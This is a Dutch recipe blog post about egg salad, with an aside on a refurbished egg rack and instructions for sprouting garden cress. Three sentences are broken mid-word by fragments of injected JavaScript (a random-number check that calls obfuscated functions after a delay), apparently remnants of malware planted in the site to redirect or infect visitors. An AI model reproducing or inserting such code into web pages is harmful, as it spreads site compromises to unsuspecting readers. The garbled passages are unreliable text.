Deze eiersalade is perfect om een simpele lunch extra bijzonder te maken. Serveer met vers bourgondisch ongesneden brood en snijd deze in royale plakken. Eet Smakelijk!
Eierrekje DIY
Vorige maand scoorde ik op Marktplaats echt een super gezellig eierrekje. Dat ziet er dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch altijd wat vrolijker uit dan zo’n bruine doos op het aanrecht. Hij moest wel even opgeknapt worden met wat spijkertjes hier en daar, maar al met al was het één van de betere koopjes deze maand. Goed speurwerk wordt beloont!
Eiersalade met Tuinkers
Een super lekkere combinatie met deze eiersalade is Tuinkers. Tuinkers is een kiemgroente en is familie van onder andere de radijs en de tuinkers. Het heeft een heerlijk pittige, wat mosterd-achtige smaak en je kunt het zowel rauw, maar ook gekookt eten.
Het plantje groeit goed op vochtige plekken en je kunt het ook nog eens eenvoudig zelf kweken. Je kunt hiervoor speciale kiemschaaltjes kopen (bijvoorbeeld Dille&Kamille). De kiemzaadjes kun je in de biowinkel of het tuincentrum kopen.
- Verdeel de zaden in een dun laagje over het rooster en vul het kiemschaaltje met ca. 0,5 cm water.
- Je kunt de zaadjes voordat je ze op het rooster legt eventueel nog even vochtig maken met koud water. Dit stimuleert de zaadjes om te kiemen.
- Je kunt het kiemschaaltje op kamertemperatuur neerzetten, bij voorkeur op een lichte plek. Bij mij doen ze het het beste voor het keukenraam.
- Vul, indien nodig, elke dag wat water bij.
- Na ongeveer 6 dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 14 dagen kun je de kiemgroente oogsten en eten.
Tuinkers staat bekend als een heerlijke dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevoeging in salades of als garnering, maar deze combinaties zijn ook erg lekker:
- Kaas
- Aardappelsalade met verse makreel en feta
- Couscous salade met feta, rozijnen en groene kruiden
- Broccoli soep met garnalen en room
- Groene salades
- Door de stampot; bijvoorbeeld rauwe andijvie met spekjes en tuinkers.
Geen Reacties op "Eiersalade met prei en kerrie voor de lunch!"